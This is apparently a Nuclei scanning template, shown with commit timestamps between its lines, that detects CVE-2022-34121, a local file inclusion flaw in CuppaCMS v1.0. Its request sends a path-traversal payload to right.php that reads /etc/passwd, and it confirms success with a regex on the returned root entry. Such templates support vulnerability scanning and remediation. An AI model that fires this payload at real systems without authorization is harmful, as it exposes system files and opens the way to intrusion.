2022-09-18 06:08:37 +00:00
|
|
|
id: CVE-2022-34121
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: CuppaCMS v1.0 - Local File Inclusion
|
|
|
|
author: edoardottt
|
|
|
|
severity: high
|
|
|
|
description: |
|
2023-01-16 17:41:15 +00:00
|
|
|
Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.
|
2022-09-18 06:08:37 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
|
2022-09-20 18:45:23 +00:00
|
|
|
- https://github.com/CuppaCMS/CuppaCMS/issues/18
|
2023-01-16 17:41:15 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2022-09-18 06:08:37 +00:00
|
|
|
classification:
|
2022-09-20 18:45:23 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
2022-09-18 06:08:37 +00:00
|
|
|
cve-id: CVE-2022-34121
|
2022-09-20 18:45:23 +00:00
|
|
|
cwe-id: CWE-829
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.69358
|
|
|
|
epss-percentile: 0.97998
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
2022-09-18 13:34:43 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: cuppacms
|
|
|
|
product: cuppacms
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,lfi,cuppa,cms,cuppacms
|
2022-09-18 06:08:37 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-09-18 06:08:37 +00:00
|
|
|
- raw:
|
2022-09-18 06:17:28 +00:00
|
|
|
- |
|
2022-09-18 13:36:10 +00:00
|
|
|
POST /templates/default/html/windows/right.php HTTP/1.1
|
2022-09-18 06:08:37 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
url=../../../../../../../../../../../../etc/passwd
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-09-18 13:34:43 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
2022-09-18 06:08:37 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-09-18 13:34:43 +00:00
|
|
|
- 200
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4b0a00483046022100b349fbc017fdba9616a667d7a762c1f50f724c5f91c70a65aa366774b1b44c17022100991acb8def276e72b096d3d82bf30714f276c63f597a3bc6c7a8d081234e4413:922c64590222798bb761d5b6d8e72950
|